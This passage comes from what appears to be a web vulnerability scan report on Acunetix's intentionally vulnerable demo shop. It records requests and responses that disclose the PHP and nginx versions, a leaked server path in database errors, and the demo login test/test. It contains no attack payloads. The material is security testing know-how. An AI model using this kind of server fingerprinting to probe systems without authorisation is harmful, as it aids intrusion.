elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=4','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=5'><h3>Mean</h3></a><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=5','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=7'><h3>Trees</h3></a><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a>bla bla bla</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p><a href='#' onClick="window.open('./comment.php?pid=7','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:53 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5311 |
Response Body - size: 5,311 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Paintings</h2><div class='story'><a href='product.php?pic=6'><h3>Thing</h3></a><p><a href='showimage.php?file=./pictures/6.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/6.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=6','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:54 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4699 |
Response Body - size: 4,699 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=4 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=4 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:54 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4699 |
Response Body - size: 4,699 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/login.php |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 260 bytes. |
GET http://testphp.vulnweb.com/login.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:48 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5523 |
Response Body - size: 5,523 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>login page</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <h3>If you are already registered please enter your login information below:</h3><br> <form name="loginform" method="post" action="userinfo.php"> <table cellpadding="4" cellspacing="1"> <tr><td>Username : </td><td><input name="uname" type="text" size="20" style="width:120px;"></td></tr> <tr><td>Password : </td><td><input name="pass" type="password" size="20" style="width:120px;"></td></tr> <tr><td colspan="2" align="right"><input type="submit" value="login" style="width:75px;"></td></tr> </table> </form> </div> <div class="story"> <h3> You can also <a href="signup.php">signup here</a>.<br> Signup disabled. Please use the username <font color='red'>test</font> and the password <font color='red'>test</font>. </h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/ |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 268 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:50 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 975 |
Response Body - size: 975 bytes. |
<html>
<div id="content"> <div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 €</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/web-camera-a4tech/2/'>Price<br>10 €</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 €</a></td></table></tr></div></div> </html> |
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/ |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 310 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 170 |
Response Body - size: 170 bytes. |
Warning: mysql_connect(): Connection refused in /hj/var/www/database_connect.php on line 2
Website is out of order. Please visit back later. Thank you for understanding. |
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 327 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 170 |
Response Body - size: 170 bytes. |
Warning: mysql_connect(): Connection refused in /hj/var/www/database_connect.php on line 2
Website is out of order. Please visit back later. Thank you for understanding. |
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 314 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 170 |
Response Body - size: 170 bytes. |
Warning: mysql_connect(): Connection refused in /hj/var/www/database_connect.php on line 2
Website is out of order. Please visit back later. Thank you for understanding. |
URL | http://testphp.vulnweb.com/privacy.php |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 262 bytes. |
GET http://testphp.vulnweb.com/privacy.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 227 bytes. |
HTTP/1.1 404 Not Found
